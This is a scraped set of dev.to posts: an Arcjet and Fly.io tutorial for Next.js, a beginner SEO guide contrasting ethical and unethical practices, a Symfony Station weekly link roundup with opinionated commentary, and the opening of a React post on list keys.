Both SQL and MongoDB have their strengths and are suited to different types of applications. While SQL databases offer robust transaction management and a well-defined schema, MongoDB provides flexibility, scalability, and performance for modern, data-intensive applications. Understanding the differences and strengths of each can help you choose the right database for your project's needs | ayas_tech_2b0560ee159e661 | |
1,881,582 | Securing Your Next.js with Arcjet on Fly.io with Lightning-Fast Deployment | Summary In this tutorial, we'll walk through deploying a Next.js application to Fly.io... | 0 | 2024-06-08T21:28:50 | https://dev.to/nickolasbenakis/securing-your-nextjs-with-arcjet-on-flyio-with-lightning-fast-deployment-4kl0 | security, nextjs, deployment, webdev | ## Summary
In this tutorial, we'll walk through deploying a Next.js application to Fly.io using the Fly.io CLI and securing it with Arcjet Shield Protection. This setup ensures your application is both performant and secure, and the deployment process is incredibly fast.
## Why Arcjet
[Arcjet](https://arcjet.com/) is a powerful tool designed to provide comprehensive security features for web applications. Its primary function is to offer robust protection against common web threats, such as DDoS attacks, bot activity, and abusive behavior. Arcjet achieves this through various security measures, including rate limiting, IP blacklisting, and advanced bot detection. By integrating Arcjet into your application, you can ensure that your app remains secure, performant, and resilient against malicious activities. They do have a rich docs page with a variety of security goods for your app, where you can find them [here](https://docs.arcjet.com/).
By using Arcjet in your project you gain:
Enhanced Security: Arcjet offers state-of-the-art security features to protect your Next.js application from common threats, ensuring that your app remains secure.
Scalability: With Arcjet, you can easily scale your security measures as your application grows, ensuring consistent protection regardless of traffic volume.
Ease of Integration: Arcjet provides straightforward integration with Next.js applications, allowing developers to quickly implement advanced security features without extensive configuration. It can also be used with all the modern authentication SDKs out there such us [Clerk.dev](https://docs.arcjet.com/integrations/clerk).
## Why fly.io
[Fly.io](https://fly.io/) is a platform that enables developers to deploy and run their applications close to their users. It leverages a global network of servers to provide low-latency, high-performance hosting solutions. It simplifies the deployment process by offering a powerful CLI and automated workflows, making it easy to deploy applications with minimal hassle. Additionally, Fly.io supports various programming languages and frameworks, including Next.js, making it a versatile choice for modern web development.
By using Fly.io in your project you gain:
Ease of Deployment: The provided CLI and automated deployment workflows streamline the deployment process, enabling rapid and efficient launches.
Global Reach: Fly.io's global network allows you to deploy your application close to your users, reducing latency and improving performance.
Scalability and Performance: Fly.io's infrastructure is designed to handle high traffic volumes, ensuring that your application remains performant and responsive under load.
Integration with Modern Tools: Fly.io supports seamless integration with modern development tools and frameworks, making it an ideal choice for deploying Next.js applications.
## Setup
**Step 1 Install a Next.js app**
```bash
npx create-next-app@latest my-next-app
cd my-next-app
```
**Step 2 Install Arcjet SDK**
```bash
npm install @arcjet/next
```
Signup to Arcjet `https://app.arcjet.com/auth/signin ` and retrieve the Arcjet API key and store it in .env file on the root folder.
```
ARCJET_KEY=ajkey_***********
```
**Step 3 Create a middleware**
`src/services/protectionGuard.ts`
```typescript
import arcjet from "@arcjet/next";
const aj = arcjet({
key: process.env.ARCJET_KEY,
rules: [], // many rules can be added afterward in each route or middleware depending on the business case.
});
export * from "@arcjet/next";
export default aj;
```
`src/middleware.ts`
```typescript
import { createMiddleware, shield } from "./services/protectionGuard";
import protectionGuard from "./services/protectionGuard";
export const config = {
// matcher tells Next.js which routes to run the middleware on.
// This runs the middleware on all routes except for static assets.
matcher: ["/((?!_next/static|_next/image|favicon.ico).*)"],
};
// Pass any existing middleware with the optional existingMiddleware prop
export default createMiddleware(
protectionGuard.withRule(
shield({
mode: "LIVE",
}),
),
);
```
In the above scenario, we are using shield protection. You can find more [here](https://docs.arcjet.com/shield/concepts). But in a few words, Arcjet Shield analyzes every request to your application to detect suspicious activity. Once a certain suspicion threshold is reached, subsequent requests from that client are blocked for a while.
**Step 4 Setup Fly.io & Deploy**
You can follow the documentation [here](https://fly.io/speedrun/)
For MacOS is the steps are super simple
```Bash
brew install flyctl
```
and then you simply use the below command in the root folder
```Bash
fly launch
```
and boom 🎉 🎉 🎉 your app is getting deployed in less than 2 minutes 🚀
## Monitoring
Arcjet provides you a rich dashboard with security-oriented logs/analytics you need for your deployed app.

> We can see here some of the suspicious requests that have been blocked by shield.
## Disclosure
Arcjet contacted me to test their product and share my experience with the developer community. While they sponsored this article, they did not influence the content or opinions expressed in this write-up.
This article aims to provide an honest and unbiased guide on integrating Arcjet's SDK with a Next.js application and deploying it using Fly.io. This ensures you get an authentic look at the process and can make an informed decision about using these tools in your projects.
Transparency is key in the developer community, and I believe in sharing my experiences honestly. Arcjet offers innovative security solutions that I found valuable, and I hope this guide helps you understand how to leverage their services effectively.
## Conclusion
Incorporating Arcjet and Fly.io into your Next.js application development process offers significant benefits in terms of security, performance, and deployment efficiency. Arcjet SDK gives a great experience and it ensures that your application is protected against common threats, while Fly.io provides a robust and scalable hosting solution that enhances performance and reduces latency. Together, these tools help you build and deploy modern Next.js applications that are secure, performant, and user-friendly.
Github [repo](https://github.com/NickolasBenakis/secure-app)
| nickolasbenakis |
1,881,583 | Mastering SEO: A Beginner's Guide to Ethical and Effective Strategies | Search Engine Optimization (SEO) is a critical skill for anyone looking to enhance their online... | 0 | 2024-06-08T21:26:26 | https://dev.to/gohil1401/mastering-seo-a-beginners-guide-to-ethical-and-effective-strategies-35a6 | seo, searchengineoptimization, learning, devchallenge | Search Engine Optimization (SEO) is a critical skill for anyone looking to enhance their online presence. But before diving into techniques, it's crucial to understand how search engines work and the difference between ethical and unethical SEO practices.
**What is a Search Engine?**
A search engine is a software system designed to perform web searches, systematically scouring the World Wide Web for information specified in a textual web search query. The search engine returns a list of results, typically including web pages, images, and other types of files, ranked according to relevance. Popular examples include Google, Bing, and Yahoo.
**Key Components of a Search Engine**
Crawler/Spider: An automated program used by search engines to browse the web. Visits web pages and follows links to discover new and updated content.
Indexer: A system that processes and organizes the data collected by crawlers. Analyzes content and stores it in a database (index) for quick retrieval.
Ranking Algorithm A set of rules used by search engines to rank web pages. Evaluates factors like keywords, links, and content quality to determine the order of search results.
**White Hat SEO: Ethical Practices for Sustainable Success**
White Hat SEO refers to ethical SEO practices that follow search engine guidelines to improve a website's search rankings. These techniques focus on providing genuine value to users, ensuring a positive user experience, and building long-term success.
Techniques:
1. Quality Content: Creating valuable, relevant, and original content for
users.
2. Keyword Research: Finding and using appropriate keywords naturally
within the content.
3. On-Page SEO: Optimizing meta tags, headings, and images.
4. Backlink Building: Earning links from reputable websites.
5. Mobile Optimization: Ensuring the website is mobile-friendly.
6. User Experience (UX): Enhancing site navigation and loading speed.
Purpose:
The aim of White Hat SEO is to improve search rankings sustainably while maintaining a positive user experience. This approach builds trust with both users and search engines, ensuring long-term benefits.
**Black Hat SEO: The Risks of Unethical Practices**
In contrast, Black Hat SEO involves unethical practices that violate search engine guidelines to manipulate search rankings. These techniques often aim for quick, short-term gains, which can lead to severe penalties or even bans from search engines.
Techniques:
1. Keyword Stuffing: Overusing keywords unnaturally in the content.
2. Cloaking: Showing different content to search engines and users.
3. Link Farming: Creating or using groups of websites to artificially
boost link popularity.
4. Hidden Text: Hiding keywords in the background of the web page.
5. Content Duplication: Copying content from other websites.
6. Spam Comments: Posting irrelevant comments on blogs to get backlinks.
Purpose:
While Black Hat SEO can achieve quick results, these gains are often short-lived. Search engines are continually updating their algorithms to detect and penalize such practices, making them a risky and unsustainable approach.
Conclusion:
Understanding SEO involves recognizing the roles of search engines, embracing ethical practices, and steering clear of unethical techniques. By focusing on quality content, proper keyword usage, and enhancing user experience, you can achieve sustainable improvements in your website's search rankings. | gohil1401 |
1,881,572 | Symfony Station Communiqué — 07 June 2024: A look at Symfony, Drupal, PHP, Cybersec, and Fediverse News! | This communiqué originally appeared on Symfony Station. Welcome to this week's Symfony Station... | 0 | 2024-06-08T21:18:05 | https://symfonystation.mobileatom.net/Symfony-Station-Communique-07-June-2024 | symfony, drupal, php, fediverse | This communiqué [originally appeared on Symfony Station](https://symfonystation.mobileatom.net/Symfony-Station-Communique-07-June-2024).
Welcome to this week's Symfony Station communiqué. It's your review of the essential news in the Symfony and PHP development communities focusing on protecting democracy. That necessitates an opinionated Butlerian jihad against big tech as well as evangelizing for open-source and the Fediverse. We also cover the cybersecurity world. You can't be free without safety and privacy.
There's good content in all of our categories, so please take your time and enjoy the items most relevant and valuable to you. This is why we publish on Fridays. So you can savor it over your weekend.
Or jump straight to your favorite section via our website.
- [Symfony Universe](https://symfonystation.mobileatom.net/Symfony-Station-Communique-07-June-2024#symfony)
- [PHP](https://symfonystation.mobileatom.net/Symfony-Station-Communique-07-June-2024#php)
- [More Programming](https://symfonystation.mobileatom.net/Symfony-Station-Communique-07-June-2024#more)
- [Fighting for Democracy](https://symfonystation.mobileatom.net/Symfony-Station-Communique-07-June-2024#other)
- [Cybersecurity](https://symfonystation.mobileatom.net/Symfony-Station-Communique-07-June-2024#cybersecurity)
- [Fediverse](https://symfonystation.mobileatom.net/Symfony-Station-Communique-07-June-2024#fediverse)
Once again, thanks go out to Javier Eguiluz and Symfony for sharing [our communiqué](https://symfonystation.mobileatom.net/Symfony-Station-Communique-31-May-2024) in their [Week of Symfony](https://symfony.com/blog/a-week-of-symfony-909-27-may-2-june-2024).
**My opinions will be in bold. And will often involve cursing. Because humans.**
---
## Symfony
As always, we will start with the official news from Symfony.
Highlight -> "This week, [Symfony 7.1.0 was released](https://symfony.com/blog/symfony-7-1-0-released). We also [upgraded the official Symfony book](https://symfony.com/blog/the-symfony-fast-track-book-updated-for-symfony-6-4) to Symfony 6.4. Meanwhile, we published [more details](https://symfony.com/blog/symfonyonline-june-2024-only-7-days-to-go) about the [SymfonyOnline June 2024 conference](https://live.symfony.com/2024-online-june/) that will take place next week and about [the accommodation](https://symfony.com/blog/symfonycon-vienna-2024-all-you-need-to-know-about-accommodation) for the next [SymfonyCon Vienna 2024](https://live.symfony.com/2024-vienna-con/)."
[A Week of Symfony #909 (27 May - 2 June 2024)](https://symfony.com/blog/a-week-of-symfony-909-27-may-2-june-2024)
Blackfire has:
[Understanding continuous profiling: part 2](https://blog.blackfire.io/understanding-continuous-profiling-part-2.html)
SensioLabs has an:
[Interview with 3 SensioLabs speakers at SymfonyLive Paris 2024](https://blog.sensiolabs.com/2024/06/07/interview-with-3-sensiolabs-speakers-at-symfonylive-paris-2024/)
---
## Featured Item
We are calling our own number this week.
I won't beat a dead rocket launcher. Many people have written good reviews about Drupal's Starshot announcement. If you read our communiqués you have seen plenty of them in recent weeks and there will be more to come. In fact, [the leadership team was announced](https://dri.es/announcing-the-drupal-starshot-leadership-team) today.
Instead after a quick introduction to Starshot this article shares my vision of what it should become.
### [This should be Drupal Starshot's Destination](https://symfonystation.mobileatom.net/Drupal-Starshot)
---
### This Week
Fernando Castillo shows us how to:
[Extend your Symfony Console app with events and attributes](https://medium.com/@fernando_28520/extend-your-symfony-console-app-with-events-and-attributes-ca8ec6321430)
David Garcia says:
[You need to stop updating your Entities in Symfony and start using the Doctrine Query Builder. Here’s why.](https://david-garcia.medium.com/you-need-to-stop-updating-your-entities-in-symfony-and-start-using-the-query-builder-heres-why-15b2a2af06f2)
Cyril Pereira has:
[Multi-tenant and Symfony](https://medium.com/@cyrilgeorgespereira/multi-tenant-and-symfony-b4b69c187f36)
[Replace parameters in Symfony](https://medium.com/@cyrilgeorgespereira/replace-parameters-in-symfony-6d680a618a8e)
### Platforms
### eCommerce
Shopware announces the:
[Release notes Shopware 6.6.3.0](https://developer.shopware.com/release-notes/6.6/6.6.3.0.html)
Sylius shares the:
[Month of Sylius: May](https://sylius.com/blog/month-of-sylius-may-2024/)
PrestaShop invites you to:
[Meet the new API Platform-based API in PrestaShop 9](https://build.prestashop-project.org/news/2024/meet-prestashop9-api/)
### CMSs
Concrete CMS has:
[Joomla Alternatives](https://www.concretecms.com/about/blog/web-design/joomla-alternatives)
**This is a good follow up to my article, [Exploring the 17 Content Management Systems of Symfony](https://symfonystation.mobileatom.net/content-management-systems-symfony).**
<br/>
TYPO3 has:
[Coders' Corner: May 2024](https://typo3.com/blog/coders-corner-may-2024)
[Budget 2024 Ideas for Quarter 3/2024 Published — Vote Now!](https://typo3.org/article/budget-2024-ideas-for-quarter-3-2024-published-vote-now)
[New Certification Pricing and Enhanced Silver Membership Discounts – Effective July 2024](https://typo3.com/blog/new-certification-pricing-and-discounts)
[TYPO3 Visits AFUP Day 2024 in Poitiers](https://typo3.org/article/typo3-visits-afup-day-2024-in-poitiers)
Wolfgang Wagner asks:
[TYPO3 nutzen und die Community ignorieren? Ein schwerer Fehler!](https://wwagner.net/blog/a/typo3-nutzen-und-die-community-ignorieren-ein-schwerer-fehler)
<br/>
Drupal has:
[2024 Aaron Winborn Award Winner: Mike Anello](https://www.drupal.org/community/cwg/blog/2024-aaron-winborn-award-winner-mike-anello)
**Congratulations to my fellow Florida Drupaler. Well deserved.**
Dries Buyaert is:
[Announcing the Drupal Starshot leadership team](https://dri.es/announcing-the-drupal-starshot-leadership-team)
The Drop Times reports:
[First Drupal Starshot Session Engages Over 200 Participants; Outlines Vision and Next Steps](https://www.thedroptimes.com/40590/first-drupal-starshot-session-engages-over-200-participants-outlines-vision-and-next-steps)
John Picozzi looks at:
[Drupal Starshot: Delivering on a promise to Ambitious Site Builders](https://picozzi.com/notebook/2024/may/drupal-starshot-delivering-promise-ambitious-site-builders)
Orion shares:
[Starshot, the easy-to-install official version of Drupal CMS](https://www.orionweb.uk/blog-posts/drupal-starshot-initiatives-guide)
**One of two official versions. Eventually.**
Lullabot asks:
[Will Drupal Starshot Help Drupal Compete?](https://www.lullabot.com/articles/could-drupal-starshot-help-drupal-compete)
Sebastian Hagens has:
[Drupal’s new Starshot initiative & POSSE](https://sebastix.nl/blog/drupal-starshot-initiative-posse/)
[Drush sql:sync Error at line 1: Unknown command '\-'](https://sebastix.nl/blog/drush-sql-sync-cli-dump-error-at-line-1-unknown-command/)
On a related note, Wim Leers has the latest on Experience Builder:
[XB week 3: shape matching](http://wimleers.com/xb-week-3)
Brainsum recommends using the:
[Wordpress (Gutenberg) page editor in Drupal](https://www.brainsum.com/blog/wordpress-gutenberg-page-editor-drupal)
**So do I.**
Mario Hernandez examines:
[Automating your Drupal Front-end with ViteJS](https://mariohernandez.io/blog/automating-your-drupal-front-end-with-vitejs/)
Jay Callicott is:
[Introducing DrupalX: A Powerful Starter for Enterprise Developers](https://medium.com/@drupalninja/introducing-drupalx-a-powerful-starter-for-enterprise-developers-bbcb09b5bac9)
**A new distribution that unfortunately uses Bootcrap. But it does have Storybook integration which is a plus.**
Tag1 Consulting continues its series:
[Migrating Your Data from Drupal 7 to Drupal 10: Example repository setup and Drupal 7 site audit](https://www.tag1consulting.com/blog/migrating-your-data-drupal-7-drupal-10-example-repository-setup-and-drupal-7-site-audit)
Geonovation shows us:
[How to deploy a Drupal Website on Linux with Nginx and Docker](https://www.geonovation.it/article/how-deploy-drupal-website-linux-nginx-and-docker)
CKEditor is:
[Introducing CKEditor 5 Plugin Pack module for Drupal](https://ckeditor.com/blog/drupal-ckeditor-5-plugin-pack/)
Chapter Three shows us:
[How To Load Test a Decoupled Drupal Site](https://www.chapterthree.com/blog/how-to-load-test-a-decoupled-drupal-site)
Specbee shares:
[A quick guide to integrating CiviCRM with Drupal](https://www.specbee.com/blogs/integrating-civicrm-with-drupal)
Brian Perry explores:
[Matching Drupal’s GitLab CI ESLint Configuration in a Contrib Module](https://brianperry.dev/posts/2024/matching-drupal-eslint/)
ImageX Media details:
[The Drush Firewall Module: Increase Your Drupal Website Security by Preventing Unwanted Changes](https://imagexmedia.com/blog/drush-firewall-module-increase-drupal-security)
### Previous Weeks
---
## PHP
### This Week
php[architect] has its May edition:
[PHP Reflections](https://andreas.heigl.org/2024/06/02/of-tools-and-dependencies/)
And JetBrains has:
[PHP Annotated – May 2024](https://blog.jetbrains.com/phpstorm/2024/06/php-annotated-may-2024/)
Korben examines:
[FrankenPHP – Le serveur PHP surpuissant écrit en Go](https://korben.info/frankenphp-serveur-php-surpuissant-kevin-dunglas.html )
DDEV shares its:
[DDEV News for June](https://mailchi.mp/c325239104e5/ddev-jan-2024-news-12705836?e=dd33ff8df7)
**Great news about Joomla and Sulu.**
Servbay announces:
[ServBay 1.3.5 Official Release: Significant Updates and Enhancements](https://dev.to/servbay/servbay-135-official-release-significant-updates-and-enhancements-25kn)
Mohasin Hossain has a:
[Coding Challenge — Building wc in PHP](https://mohasin-dev.medium.com/coding-challenge-building-wc-in-php-8ef703ea7795)
Nagvekar has:
[Top 10 PHP Vulnerabilities You Need to Know: Beyond SQL Injection, XSS, and CSRF - Part 1](https://nagvekar.medium.com/top-10-php-vulnerabilities-you-need-to-know-beyond-sql-injection-xss-and-csrf-8b8d453ccc3a)
[Top 10 PHP Vulnerabilities You Need to Know: Beyond SQL Injection, XSS, and CSRF - Part 2](https://nagvekar.medium.com/top-10-php-vulnerabilities-you-need-to-know-beyond-sql-injection-xss-and-csrf-d38ef457190b)
Grant Horwood looks at:
[PHP: doing recursion with recursive iterator(iterator)s](https://gbh.fruitbat.io/2024/06/04/php-doing-recursion-with-recursive-iteratoriterators/)
Backpack has these tips:
[Laravel Advanced: Lesser-Known, Yet Useful Composer Commands](https://backpackforlaravel.com/articles/tips-and-tricks/laravel-advanced-lesser-known-yet-useful-composer-commands)
Gizra explores:
[Private Composer Repos Using DDEV](https://www.gizra.com/content/private-composer-repos-in-ddev/)
Shishir Kumar show us how to:
[Develop Your First Web App with Lando — Beginner Guide](https://medium.com/@sky8052785942ocean/develop-your-first-web-app-with-lando-beginner-guide-9e5b1c1b4708)
spO0q examines:
[PHP 8.4: Property Hooks](https://dev.to/spo0q/php-84-property-hooks-45i8)
Charles Sprayberry has:
[Thoughts on PHPUnit 11](https://www.cspray.io/blog/thoughts-on-phpunit-11/)
Bruno Oliveira looks at:
[`foreach` vs `array_map` no PHP: Objetivos, Quando Usar e Exemplos](https://boliveiradev.medium.com/foreach-vs-array-map-no-php-objetivos-quando-usar-e-exemplos-46a145713302)
Rizky Ikbal explores:
[Decorator-like function as in typescript on PHP](https://dev.to/rizkiiqbal36/decorator-like-function-as-in-typescript-on-php-5c49)
---
## More Programming
Ahmad Shadeed looks at CSS's:
[Cap Unit](https://ishadeed.com/article/css-cap-unit/)
Smashing Magazine shares some:
[Useful CSS Tips And Techniques](https://www.smashingmagazine.com/2024/06/css-tips-and-techniques/)
Fontend Masters has:
[Live Demos of Stand Alone Web Components](https://frontendmasters.com/blog/live-demos-of-stand-alone-web-components/)
[Here’s What We Learned From the First State of HTML Survey](https://frontendmasters.com/blog/state-of-html-2023-results-2/)
Marc van Neerven shares:
[The PURE Manifesto — for Web Standards based Design Systems](https://medium.com/cto-as-a-service/the-pure-manifesto-for-web-standards-based-design-systems-d46f400853eb)
The Wall Street Journal reports:
[The AI Revolution Is Already Losing Steam](https://www.wsj.com/tech/ai/the-ai-revolution-is-already-losing-steam-a93478b1?st=cxcxdw8taqryjg9&reflink=desktopwebshare_permalink)
**Let's hope it blows the rest of its valves and throws a rod.**
TechCrunch reports:
[Greptile raises $4M to build an AI-fueled code base expert](https://techcrunch.com/2024/06/06/greptile-raises-4m-to-build-an-ai-code-base-expert/)
---
## Fighting for Democracy
[Please visit our Support Ukraine page](https://symfonystation.mobileatom.net/Support-Ukraine)to learn how you can help
kick Russia out of Ukraine (eventually, like ending apartheid in South Africa).
### The cyber response to Russia’s War Crimes and other douchebaggery
404 Media reports on:
[An AirTags Stalking Sting Operation](https://www.404media.co/email/ce4cec4d-51c3-4101-b2b4-2c9a64aee5e8/?ref=daily-stories-newsletter)
**He was a Russian human smuggler so what can you expect. Plus Apple doesn't really care about security unless it just barely helps them beat their mofo competitors.**
DarkReading reports:
['Sticky Werewolf' APT Stalks Aviation Sector](https://www.darkreading.com/threat-intelligence/sticky-werewolf-apt-stalks-aviation-sector)
TechCrunch repoerts:
[LinkedIn to limit targeted ads in EU after complaint over sensitive data use](https://techcrunch.com/2024/06/07/linkedin-to-limit-targeted-ads-in-eu-after-complaint-over-sensitive-data-use/)
The New York Times reports:
[U.S. Clears Way for Antitrust Inquiries of Nvidia, Microsoft and OpenAI](https://www.nytimes.com/2024/06/05/technology/nvidia-microsoft-openai-antitrust-doj-ftc.html?unlocked_article_code=1.xk0.gp2N.rgOZ4gPtBfui&smid=nytcore-ios-share&referringSource=articleShare&sgrp=c-cb)
noyb announces:
[noyb urges 11 DPAs to immediately stop Meta's abuse of personal data for AI](https://noyb.eu/en/noyb-urges-11-dpas-immediately-stop-metas-abuse-personal-data-ai)
The Next Web reports:
[Mandatory ID for social media would solve some problems — but create a lot more](https://thenextweb.com/news/mandatory-id-social-media-problems)
Euronews reports:
[EU countries beef up anti-disinformation efforts ahead of European elections](https://www.euronews.com/my-europe/2024/06/05/eu-countries-beef-up-anti-disinformation-efforts-ahead-of-european-elections)
### The Evil Empire Strikes Back
And:
[Russiagate to Portal Kombat: The foreign misinformation campaigns shifting the European elections](https://www.euronews.com/next/2024/06/06/russiagate-to-portal-kombat-the-foreign-misinformation-campaigns-shifting-the-european-ele)
The Kyiv Post reports:
[Russian Foundation Front for Kremlin Intel Ops in Europe, Investigations Say](https://www.kyivpost.com/post/33704)
The Register reports:
[Russia takes gold for disinformation as Olympics approach](https://www.theregister.com/2024/06/03/russias_cyberattacks_against_2024_olympics/)
[Microsoft accused of tracking kids with education software](https://www.theregister.com/2024/06/04/noyb_microsoft_complaint/)
**With their recent Recall fiasco this is no surprise.**
The Washington Post reports:
[News site editor’s ties to Iran, Russia show misinformation’s complexity](https://www.washingtonpost.com/technology/2024/06/02/grayzone-russia-iran-support/?pwapi_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyZWFzb24iOiJnaWZ0IiwibmJmIjoxNzE3MzAwODAwLCJpc3MiOiJzdWJzY3JpcHRpb25zIiwiZXhwIjoxNzE4NjgzMTk5LCJpYXQiOjE3MTczMDA4MDAsImp0aSI6IjdiYTRmZGRjLTVlNzktNDc0Yi05ZTQ5LWI4MjAzYzA1YTAyYSIsInVybCI6Imh0dHBzOi8vd3d3Lndhc2hpbmd0b25wb3N0LmNvbS90ZWNobm9sb2d5LzIwMjQvMDYvMDIvZ3JheXpvbmUtcnVzc2lhLWlyYW4tc3VwcG9ydC8ifQ.qbWvRG6TSsT5M0dCrTxF8lA5kkl1slJXsQ0wUG2zWWM)
Euronews reports:
[Pro-Russia group claims responsibility for cyber-attacks on first day of EU elections](https://www.euronews.com/my-europe/2024/06/06/pro-russia-group-claims-responsibility-for-cyber-attacks-on-first-day-of-eu-election)
The New York Times reports:
[Israel Secretly Targets U.S. Lawmakers With Influence Campaign on Gaza War](https://www.nytimes.com/2024/06/05/technology/israel-campaign-gaza-social-media.html?unlocked_article_code=1.xU0.4NvV.KiJSve6l5dmw&smid=url-share)
Bleeping Computer reports:
[Ukraine says hackers abuse SyncThing data sync tool to steal data](https://www.bleepingcomputer.com/news/security/ukraine-says-hackers-abuse-syncthing-data-sync-tool-to-steal-data/)
[Chinese hacking groups team up in cyber espionage campaign](https://www.bleepingcomputer.com/news/security/chinese-hacking-groups-team-up-in-cyber-espionage-campaign/#google_vignette)
[Hackers exploit 2018 ThinkPHP flaws to install ‘Dama’ web shells](https://www.bleepingcomputer.com/news/security/hackers-exploit-2018-thinkphp-flaws-to-install-dama-web-shells/)
The Hacker News reports:
[Andariel Hackers Target South Korean Institutes with New Dora RAT Malware](https://thehackernews.com/2024/06/andariel-hackers-target-south-korean.html)
NBC News reports:
[~~Trump~~ Convict Don joins TikTok years after trying to ban the app](https://www.nbcnews.com/politics/2024-election/trump-joins-tiktok-years-trying-ban-app-rcna155072)
The Guardian reports:
[Revenge: analysis of ~~Trump~~ Orange Jailbird posts shows relentless focus on punishing enemies](https://www.theguardian.com/us-news/article/2024/jun/02/trump-social-media-threats)
404 Media reports:
[Google Leak Reveals Thousands of Privacy Incidents](https://www.404media.co/email/3a9e7d83-da6e-4041-9e7f-e9854cf29b95/?ref=daily-stories-newsletter)
[Facebook’s Taylor Swift Fan Pages Taken Over by Animal Abuse, Porn, and Scams](https://www.404media.co/facebooks-taylor-swift-fan-pages-taken-over-by-bestiality-porn-and-scams-2/)
**Jesus.**
PC World reports:
[Google is working on a Recall-like feature for Chromebooks, too](https://www.pcworld.com/article/2358215/google-is-working-on-a-version-of-recall-too.html)
Windows Central reports:
[A PR disaster: Microsoft has lost trust with its users, and Windows Recall is the straw that broke the camel's back](https://www.windowscentral.com/software-apps/windows-11/microsoft-has-lost-trust-with-its-users-windows-recall-is-the-last-straw)
**It's hard to believe how fucking stupid the top management is at these big tech companies. Looks like my next laptop is going to have to be a [custom Framework with Linux installed](https://frame.work/products/laptop16-diy-amd-7040).**
Venture Beat reports:
[More OpenAI researchers slam company on safety, call for ‘right to warn’ to avert ‘human extinction’](https://venturebeat.com/ai/more-openai-researchers-slam-company-on-safety-call-for-right-to-warn-to-avert-human-extinction/)
### Cybersecurity/Privacy
Dark Reading reports:
[CISA's Secure by Design Initiative at 1: A Report Card](https://www.darkreading.com/vulnerabilities-threats/cisas-secure-by-design-initiative-at-1-report-card)
[Developing a Plan to Respond to Critical CVEs in Open Source Software](https://www.darkreading.com/vulnerabilities-threats/developing-plan-to-respond-to-critical-cves-open-source-software)
BleepingComputer reports:
[PHP fixes critical RCE flaw impacting all versions for Windows](https://www.bleepingcomputer.com/news/security/php-fixes-critical-rce-flaw-impacting-all-versions-for-windows/)
The Hacker News reports:
[The Next Generation of RBI (Remote Browser Isolation)](https://thehackernews.com/2024/06/the-next-generation-of-rbi-remote.html)
Trip Wire reports:
[Hit by LockBit? The FBI is waiting to help you with over 7,000 decryption keys](https://www.tripwire.com/state-of-security/hit-lockbit-fbi-waiting-help-you-over-7000-decryption-keys)
Ars Technica reports:
[FCC pushes ISPs to fix security flaws in Internet routing](https://arstechnica.com/tech-policy/2024/06/fcc-pushes-isps-to-fix-security-flaws-in-internet-routing/)
---
### Fediverse
The Fediverse Report has:
[Last Week in Fediverse – ep 71](https://fediversereport.com/last-week-in-fediverse-ep-71/)
Michael Foster opines:
[We need to finish building the Fediverse](https://www.blog-pat.ch/we-need-to-finish-building-the-fediverse/)
**And he is right.**
We Distribute reports:
[IFTAS Launches Moderator Resource Portal](https://wedistribute.org/2024/06/iftas-connect-launches/)
NotizBlog provides an update:
[Enable Mastodon Apps](https://notiz.blog/2024/03/21/enable-mastodon-apps/ "Permalink to Enable Mastodon Apps")
These Yaks Ain't Gonna Shave Themselves (great blog name) explores:
[Getting A Local Mastodon Setup In Docker](https://polotek.net/posts/local-mastodon-in-docker/)
NewsMast is:
[Mapping the social web](https://www.newsmastfoundation.org/our-blog/mapping-the-social-web/)
Darnell Day looks at:
[Tumblr Alternative Loforo: Most Active Fediverse Blog Option After WordPress?](https://darnell.day/tumblr-alternative-loforo-most-active-fediverse-blog-option-after-wordpress)
Evan Prodromou announces:
[I turned in my Activity Pub manuscript!](https://evanp.me/2024/06/03/i-turned-in-my-manuscript/)
Ghost has an Activity Pub update:
[I think you'll find it's a little more complicated than that](https://activitypub.ghost.org/day3/)
Friendica announces:
[Friendica 2024.06 Release Candidate available](https://forum.friendi.ca/display/39bbe52a-93ec3a88-d847ec4f77bb097b)
Soatok has this interesting bit:
[Towards Federated Key Transparency](https://soatok.blog/2024/06/06/towards-federated-key-transparency/)
Darnell Day reports:
[Threads Muting Pixelfed And Other Fediverse Instances Over One Simple Rule](https://darnell.day/threads-muting-pixelfed-and-other-fediverse-instances-over-one-simple-rule)
### Other Federated Social Media
We Distribute has:
[How to Set Up a Verified Nostr Address](https://wedistribute.org/2024/05/nostr-nip-05/)
**Why would you? Again, Nostr is federated social media for Crypto Bros, AI Authoritarians (who think they're libertarians), and other Silicon Valley c^nts like Jack Dorsey. But, at least they are leaving Shitter.**
[TIDAL Embraces Nostr, CashApp May Follow](https://wedistribute.org/2024/06/tidal-embraces-nostr/)
TechCrunch reports:
[Bluesky and Mastodon users can now talk to each other with Bridgy Fed](https://techcrunch.com/2024/06/05/bluesky-and-mastodon-users-can-now-talk-to-each-other-with-bridgy-fed/)
---
## CTAs (aka show us some free love)
- That’s it for this week. Please share this communiqué.
- Also, please [join our newsletter list for The Payload](https://newsletter.mobileatom.net/). Joining gets you each week's communiqué in your inbox (a day early).
- Follow us [on Flipboard](https://flipboard.com/@mobileatom/symfony-for-the-devil-allupr6jz)or at [@symfonystation@drupal.community](https://drupal.community/@SymfonyStation)on Mastodon for daily coverage.
- Do you like Reddit? Why? Instead, follow us [on kbin](https://kbin.social/u/symfonystation)for a better Fediverse and Symfony-based experience. We have a [Symfony Magazine](https://kbin.social/m/Symfony)and [Collection](https://kbin.social/c/SymfonyUniverse)there.
Do you own or work for an organization that would be interested in our promotion opportunities? Or supporting our journalistic efforts? If so, please get in touch with us. We’re in our toddler stage, so it’s extra economical. 😉
More importantly, if you are a Ukrainian company with coding-related products, we can offer free promotion on [our Support Ukraine page](https://symfonystation.mobileatom.net/Support-Ukraine). Or, if you know of one, get in touch.
You can find a vast array of curated evergreen content on our [communiqués page](https://symfonystation.mobileatom.net/communiques).
## Author

### Reuben Walker
Founder
Symfony Station | reubenwalker64 |
1,881,491 | How KEY plays a vital role in React ? | In this blog, we will cover: Why is a Key Needed in React? Why Avoid Using the Index as a Key? How... | 0 | 2024-06-08T21:14:51 | https://dev.to/nadeemkhanrtm/react-the-hidden-dangers-of-using-index-as-a-key-1mbi | react, javascript, tutorial, webdev | In this blog, we will cover:
- Why is a **Key** Needed in React?
- Why Avoid Using the Index as a Key?
- How Using Index as Key Creates Problems?
Consider this example where we have a list of product categories like Beauty, Fragrances, Furniture, etc. When a category is selected, we display the product details of that category using data from the [dummyjson](https://dummyjson.com/docs/products#products-categories).

**Code:**
```
// src/app/page.tsx
import CategoryContainer from "@/components/home-container";
import "../styles/global.css";
export default async function Home() {
const response = await fetch("https://dummyjson.com/products/category-list");
const data: string[] = await response.json();
